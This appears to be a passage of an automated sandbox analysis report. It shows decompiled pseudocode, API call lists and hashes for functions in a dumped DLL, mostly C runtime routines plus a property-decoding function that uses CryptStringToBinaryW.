API ID: DeleteTree__vsnwprintf_lvswprintf
String ID: KindMap$PropertyHandlers$Software\Classes\%s
API String ID: 1945471109-984809517
Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}

0x1000cb56
0x1000cb5d
0x1000cb66
0x1000cb73
0x1000cbc5
0x1000cbc5
0x1000cb75
0x1000cb75
0x1000cb7d
0x1000cb8b
0x00000000
0x00000000
0x00000000
0x00000000
0x1000cb93
0x1000cb93
0x1000cb95
0x1000cba7
0x00000000
0x1000cba9
0x1000cba9
0x1000cbb9
0x00000000
0x1000cbbb
0x1000cbc1
0x1000cbc1
0x1000cbb9
0x1000cba7
0x1000cb7d
0x1000cbc8
0x1000cbe0
0x1000cbe7
0x1000cbf5
0x1000cbe9
0x1000cbf0
0x1000cbf0
0x1000cbfa
0x1000cb5f
0x1000cb63
0x1000cb63

APIs

__ioinit.LIBCMT ref: 1000CB56

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

__get_osfhandle.LIBCMT ref: 1000CB6A
__get_osfhandle.LIBCMT ref: 1000CB95
__get_osfhandle.LIBCMT ref: 1000CB9E
__get_osfhandle.LIBCMT ref: 1000CBAA
CloseHandle.KERNEL32(00000000), ref: 1000CBB1
GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
__free_osfhnd.LIBCMT ref: 1000CBC8
__dosmaperr.LIBCMT ref: 1000CBEA

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
String ID:
API String ID: 974577687-0
Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150

Uniqueness

Uniqueness Score: -1.00%

Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
VariantClear.OLEAUT32(?), ref: 10002B69

Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A

PropVariantClear.OLE32(?), ref: 10002B59
VariantClear.OLEAUT32(?), ref: 10002B63

Strings

EncodedValue, xrefs: 10002B09
Key, xrefs: 10002ACA
Recipe/ExtendedProperties/Property, xrefs: 10002A35

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
API String ID: 3673094071-3396277477
Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}

0x100061ba
0x100061c6
0x100061d5
0x100061db
0x100061e0
0x100061e3
0x00000000
0x100061e5
0x100061f2
0x100061f6
0x100061f8
0x10006227
0x10006227
0x1000622c
0x1000622f
0x100061fa
0x10006208
0x1000620a
0x00000000
0x1000620c
0x1000620c
0x1000620e
0x1000620f
0x10006216
0x1000621c
0x10006220
0x10006224
0x10006226
0x10006226
0x1000620a
0x100061f8
0x100061c8
0x100061c8
0x100061c8
0x100061cf
0x100061cf

APIs

__init_pointers.LIBCMT ref: 100061BA

Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532

__mtinitlocks.LIBCMT ref: 100061BF

Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8

__mtterm.LIBCMT ref: 100061C8

Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F

__calloc_crt.LIBCMT ref: 100061ED
__initptd.LIBCMT ref: 1000620F
GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 757573777-0
Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150

Uniqueness

Uniqueness Score: -1.00%

Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}

0x1000c46d
0x1000c474
0x1000c47c
0x1000c481
0x1000c487
0x1000c48a
0x1000c48c
0x1000c48f
0x1000c49e
0x1000c4a1
0x1000c4bd
0x1000c4bf
0x1000c4c2
0x1000c4d7
0x1000c4dd
0x1000c4e0
0x1000c4e3
0x1000c4e6
0x1000c4eb
0x1000c4ed
0x1000c4f5
0x1000c4f7
0x1000c505
0x1000c506
0x1000c50c
0x1000c50e
0x00000000
0x00000000
0x1000c4f9
0x1000c4f9
0x1000c501
0x1000c503
0x1000c510
0x1000c511
0x00000000
0x00000000
0x00000000
0x1000c503
0x1000c4f7
0x1000c517
0x1000c51e
0x1000c5a0
0x1000c5a4
0x1000c5a9
0x1000c5aa
0x1000c5ab
0x1000c5b2
0x1000c5b7
0x1000c5bd
0x00000000
0x1000c520
0x1000c520
0x1000c528
0x1000c52d
0x1000c532
0x1000c535
0x1000c538
0x1000c53a
0x1000c553
0x1000c556
0x1000c573
0x1000c573
0x1000c558
0x1000c558
0x1000c55b
0x00000000
0x1000c55d
0x1000c56a
0x1000c56a
0x1000c55b
0x1000c578
0x1000c57c
0x00000000
0x1000c57e
0x1000c57e
0x1000c580
0x1000c581
0x1000c582
0x1000c583
0x1000c58d
0x1000c590
0x00000000
0x00000000
0x00000000
0x00000000
0x1000c590
0x1000c53c
0x1000c53c
0x1000c53d
0x1000c53e
0x1000c547
0x1000c592
0x1000c595
0x1000c598
0x1000c5bf
0x1000c5bf
0x1000c5c2
0x1000c5cf
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x1000c5c4
0x00000000
0x1000c5c4
0x1000c5c2
0x1000c53a
0x1000c4c4
0x1000c4c4
0x1000c4c7
0x1000c4ca
0x1000c54e
0x1000c5c8
0x1000c5c8
0x1000c4cc
0x1000c4cf
0x1000c4cf
0x1000c4d2
0x1000c4d4
0x00000000
0x1000c4d4
0x1000c4ca
0x1000c4a3
0x1000c4a8
0x00000000
0x1000c4a8
0x1000c491
0x1000c496
0x1000c4ae
0x1000c4ae
0x1000c4b2
0x1000c4b2
0x1000c5d6
0x1000c476
0x1000c47a
0x1000c47a

APIs

__ioinit.LIBCMT ref: 1000C46D

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction ID: 4d06972f43a844bfa3949195b83d417bb95582cf177f034ad1b947d460bfdcb6
Opcode Fuzzy Hash: ce445c66c181a3168f9633bae39411e21304db9b0211bfbf8d544381d7ae233e
Instruction Fuzzy Hash: B641E175500B099BF724CB68CC91E6A77E4EF453E1F10861DE8A6876D9E774FD808B10

Uniqueness

Uniqueness Score: -1.00%

Function 10005033, Relevance: 9.1, APIs: 6, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10005033(void* __eflags, signed char _a4, intOrPtr* _a8) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t43;
				signed int _t44;
				signed int _t45;
				signed int _t48;
				signed int _t52;
				void* _t60;
				signed int _t62;
				void* _t64;
				signed int _t67;
				signed int _t70;
				signed int _t74;
				signed int _t76;
				void* _t77;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;
				intOrPtr* _t92;

				_t44 = E100076DE(_t43);
				if(_t44 >= 0) {
					_t92 = _a8;
					_t45 = E100095F8(_t92);
					_t2 = _t92 + 0xc; // 0x66ce7cf0
					_t74 =  *_t2;
					_t89 = _t45;
					__eflags = _t74 & 0x00000082;
					if((_t74 & 0x00000082) != 0) {
						__eflags = _t74 & 0x00000040;
						if((_t74 & 0x00000040) == 0) {
							_t70 = 0;
							__eflags = _t74 & 0x00000001;
							if((_t74 & 0x00000001) == 0) {
								L10:
								_t16 = _t92 + 0xc; // 0x66ce7cf0
								_t48 =  *_t16 & 0xffffffef | 0x00000002;
								 *(_t92 + 0xc) = _t48;
								 *(_t92 + 4) = _t70;
								__eflags = _t48 & 0x0000010c;
								if((_t48 & 0x0000010c) == 0) {
									_t60 = E1000951C();
									__eflags = _t92 - _t60 + 0x20;
									if(_t92 == _t60 + 0x20) {
										L13:
										_t62 = E1000961C(_t89);
										__eflags = _t62;
										if(_t62 == 0) {
											goto L14;
										}
									} else {
										_t64 = E1000951C();
										__eflags = _t92 - _t64 + 0x40;
										if(_t92 != _t64 + 0x40) {
											L14:
											E1000A133(_t92);
										} else {
											goto L13;
										}
									}
								}
								__eflags =  *(_t92 + 0xc) & 0x00000108;
								if(( *(_t92 + 0xc) & 0x00000108) == 0) {
									__eflags = 1;
									_push(1);
									_v8 = 1;
									_push( &_a4);
									_push(_t89);
									_t45 = E10009680(_t70, _t86, _t89, _t92, 1);
									_t70 = _t45;
									goto L27;
								} else {
									_t24 = _t92 + 8; // 0x753b46c6
									_t87 =  *_t24;
									_t25 = _t87 + 1; // 0x753b46c7
									 *_t92 = _t25;
									_t26 = _t92 + 0x18; // 0x8b0d78fe
									_t76 =  *_t92 - _t87;
									_v8 = _t76;
									 *(_t92 + 4) =  *_t26 - 1;
									__eflags = _t76;
									if(__eflags <= 0) {
										__eflags = _t89 - 0xffffffff;
										if(_t89 == 0xffffffff) {
											L22:
											_t77 = 0x10012340;
										} else {
											__eflags = _t89 - 0xfffffffe;
											if(_t89 == 0xfffffffe) {
												goto L22;
											} else {
												_t77 = ((_t89 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t89 >> 5) * 4));
											}
										}
										__eflags =  *(_t77 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t70);
											_push(_t70);
											_push(_t89);
											_t45 = E10009FB9(_t70, _t89, _t92, __eflags) & _t87;
											__eflags = _t45 - 0xffffffff;
											if(_t45 == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t76);
										_push(_t87);
										_push(_t89);
										_t70 = E10009680(_t70, _t87, _t89, _t92, __eflags);
										L25:
										_t35 = _t92 + 8; // 0x753b46c6
										_t45 = _a4;
										 *( *_t35) = _t45;
										L27:
										__eflags = _t70 - _v8;
										if(_t70 == _v8) {
											_t52 = _a4 & 0x000000ff;
										} else {
											L28:
											_t40 = _t92 + 0xc;
											 *_t40 =  *(_t92 + 0xc) | 0x00000020;
											__eflags =  *_t40;
											goto L29;
										}
									}
								}
							} else {
								 *(_t92 + 4) = 0;
								__eflags = _t74 & 0x00000010;
								if((_t74 & 0x00000010) == 0) {
									 *(_t92 + 0xc) = _t74 | 0x00000020;
									L29:
									_t52 = _t45 | 0xffffffff;
								} else {
									_t14 = _t92 + 8; // 0x753b46c6
									_t85 = _t74 & 0xfffffffe;
									__eflags = _t85;
									 *_t92 =  *_t14;
									 *(_t92 + 0xc) = _t85;
									goto L10;
								}
							}
						} else {
							_t67 = E10005EC6();
							 *_t67 = 0x22;
							goto L6;
						}
					} else {
						_t67 = E10005EC6();
						 *_t67 = 9;
						L6:
						 *(_t92 + 0xc) =  *(_t92 + 0xc) | 0x00000020;
						_t52 = _t67 | 0xffffffff;
					}
					return _t52;
				} else {
					return _t44 | 0xffffffff;
				}
			}

0x10005037
0x1000503e
0x10005046
0x1000504b
0x10005051
0x10005051
0x10005054
0x10005056
0x10005059
0x10005068
0x1000506b
0x10005085
0x10005087
0x1000508a
0x1000509f
0x1000509f
0x100050a5
0x100050a8
0x100050ab
0x100050ae
0x100050b3
0x100050b5
0x100050bd
0x100050bf
0x100050cd
0x100050ce
0x100050d4
0x100050d6
0x00000000
0x00000000
0x100050c1
0x100050c1
0x100050c9
0x100050cb
0x100050d8
0x100050d9
0x00000000
0x00000000
0x00000000
0x100050cb
0x100050bf
0x100050df
0x100050e6
0x10005164
0x10005165
0x10005166
0x1000516c
0x1000516d
0x1000516e
0x10005176
0x00000000
0x100050e8
0x100050e8
0x100050e8
0x100050ed
0x100050f0
0x100050f2
0x100050f5
0x100050f8
0x100050fb
0x100050fe
0x10005100
0x10005119
0x1000511c
0x10005139
0x10005139
0x1000511e
0x1000511e
0x10005121
0x00000000
0x10005123
0x10005130
0x10005130
0x10005121
0x1000513e
0x10005142
0x00000000
0x10005144
0x10005144
0x10005146
0x10005147
0x10005148
0x1000514e
0x10005153
0x10005156
0x00000000
0x00000000
0x00000000
0x00000000
0x10005156
0x10005102
0x10005102
0x10005103
0x10005104
0x1000510d
0x10005158
0x10005158
0x1000515b
0x1000515e
0x10005178
0x10005178
0x1000517b
0x10005186
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x1000517d
0x00000000
0x1000517d
0x1000517b
0x10005100
0x1000508c
0x1000508c
0x1000508f
0x10005092
0x10005114
0x10005181
0x10005181
0x10005094
0x10005094
0x10005097
0x10005097
0x1000509a
0x1000509c
0x00000000
0x1000509c
0x10005092
0x1000506d
0x1000506d
0x10005072
0x00000000
0x10005072
0x1000505b
0x1000505b
0x10005060
0x10005078
0x10005078
0x1000507c
0x1000507c
0x1000518e
0x10005040
0x10005044
0x10005044

APIs

__ioinit.LIBCMT ref: 10005037

Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$ExecuteInit__ioinit
String ID:
API String ID: 129814473-0
Opcode ID: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction ID: 32086827ce60b9a2cbb99d25a0e80922b058c4e771a23cab2cd98d30bef894a1
Opcode Fuzzy Hash: 094f6d4174cdee5f7286b7252394e54f5dc20bac084be214e94df9e6538c1141
Instruction Fuzzy Hash: 4A41F171900B059FF324CF68C851BAB77E4DF453E2B10871DE8B6C62D9E676E9408B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004A66, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E10004A66(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char* _v16;
				char _v28;
				signed char _v32;
				void* _t10;
				void* _t19;
				intOrPtr* _t22;
				void* _t24;
				void* _t25;
				intOrPtr* _t27;

				_t25 = __edi;
				_t24 = __edx;
				_t19 = __ebx;
				while(1) {
					_t10 = E10008E67(_t19, _t24, _t25, _a4);
					if(_t10 != 0) {
						break;
					}
					if(E10009026(_t10, _a4) == 0) {
						_push(1);
						_t22 =  &_v28;
						_v16 = "bad allocation";
						E10008F1E(_t22,  &_v16);
						_v28 = 0x1000e460;
						E10009059( &_v28, 0x10010b04);
						asm("int3");
						_t27 = _t22;
						 *_t27 = 0x1000e460;
						E10008F5C(_t22);
						if((_v32 & 0x00000001) != 0) {
							L10003800(_t27);
						}
						return _t27;
					} else {
						continue;
					}
					L7:
				}
				return _t10;
				goto L7;
			}

0x10004a66
0x10004a66
0x10004a66
0x10004a7b
0x10004a7e
0x10004a86
0x00000000
0x00000000
0x10004a79
0x10004a8a
0x10004a90
0x10004a93
0x10004a9a
0x10004aa8
0x10004aaf
0x10004ab4
0x10004ab9
0x10004abb
0x10004ac1
0x10004aca
0x10004acd
0x10004ad2
0x10004ad7
0x00000000
0x00000000
0x00000000
0x00000000
0x10004a79
0x10004a89
0x00000000

APIs

_malloc.LIBCMT ref: 10004A7E

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00680000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

std::exception::exception.LIBCMT ref: 10004A9A
__CxxThrowException@8.LIBCMT ref: 10004AAF

Part of subcall function 10009059: RaiseException.KERNEL32(?,?,?,10010B04,?,?,?,10004AB4,?,10010B04,00000000,00000001), ref: 100090AA

Strings

`, xrefs: 10004AA8
h, xrefs: 10004A93

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
String ID: `$h
API String ID: 1059622496-773005782
Opcode ID: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction ID: ad3e8221741d280e2df0066782729e531edcb1fd3c4a4238d597797a5e5b62a6
Opcode Fuzzy Hash: 8198483a73eec0a2752513ca626908b84cd43bbea8819fe80895fe02013f144e
Instruction Fuzzy Hash: C2F028B550024D6AFB00DBA8DC01ADF77ACEF023C4F114426F900A2149CFB1AA4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 1000B39B, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E1000B39B(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0x100132fc, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0x10013c2c == _t7) {
									_t9 = E10005EC6();
									 *_t9 = E10005ED9(GetLastError());
									goto L17;
								} else {
									if(E10009026(_t7, _t31) == 0) {
										_t12 = E10005EC6();
										 *_t12 = E10005ED9(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E10009026(_t6, _t31);
						 *((intOrPtr*)(E10005EC6())) = 0xc;
						goto L12;
					} else {
						E10004732(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E10008E67(__ebx, __edx, __edi, _a8);
				}
			}

0x1000b3a2
0x1000b3b0
0x1000b3b5
0x1000b3c4
